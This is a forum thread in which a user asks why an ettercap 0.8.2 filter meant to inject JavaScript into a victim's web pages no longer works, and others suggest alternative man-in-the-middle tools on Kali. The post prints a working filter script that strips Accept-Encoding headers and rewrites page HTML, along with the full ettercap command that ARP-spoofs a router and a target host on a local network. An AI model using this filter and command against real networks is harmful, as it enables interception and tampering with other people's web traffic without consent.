Jump to content

Does ettercap filter still work now?


kdlsw

Recommended Posts

I'm trying to perform a javascript injection with ettercap 0.8.2 and its filter, but it did not work. All the relevant topics I found are before 2016, I am not sure if this kind of attack still works now? Anyway, this is my filter script

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Nothing!");
msg("zapped Accept-Encoding!\n");
}
}

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "<head>")) {
replace("<head>", "<HEAD>");
msg("Code injected");
}
}

And I run it as

ettercap -T -q -i wlan0 -F test.ef -M arp:remote /192.168.0.1// /192.168.0.100//

test.ef is the compiled filter file.

When the victim opens any web page, I got a lot of "zapped Accept-Encoding!" messages, but no "Code injected", and of course the html source code on the victim side is untouched. The part I really don't understand is, if I remove the search condition for the second part,

if (ip.proto == TCP && tcp.dst == 80) {

replace("<head>", "<HEAD>");
msg("Code injected");

}

"Code injected" message shows, but html code on the web client is not changed, which means, the problem is that the filter cannot find any named strings (in this case <head>) in the html file, it can only deal with the header (Accept-Encoding). Does anyone know a solution or work around, please, any suggestions will be appreciated, thanks

Link to comment
Share on other sites

2 hours ago, kdlsw said:

@digipThanks, I will look into that. so many options for mitm these days, I just tested MITMF, another similar tool, which didn't work for me too well, hope this one is good. Thank you.

If you're using Kali, a lot of these tools should be installed, and if not, are in the repo and should all work once installed, dependencies as well. Often its something simple though, like forgetting to add a switch or IP forward for a tool like mitm attacks.

Link to comment
Share on other sites

10 hours ago, digip said:

If you're using Kali, a lot of these tools should be installed, and if not, are in the repo and should all work once installed, dependencies as well. Often its something simple though, like forgetting to add a switch or IP forward for a tool like mitm attacks.

Thank you, this is helpful! I will try it!

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...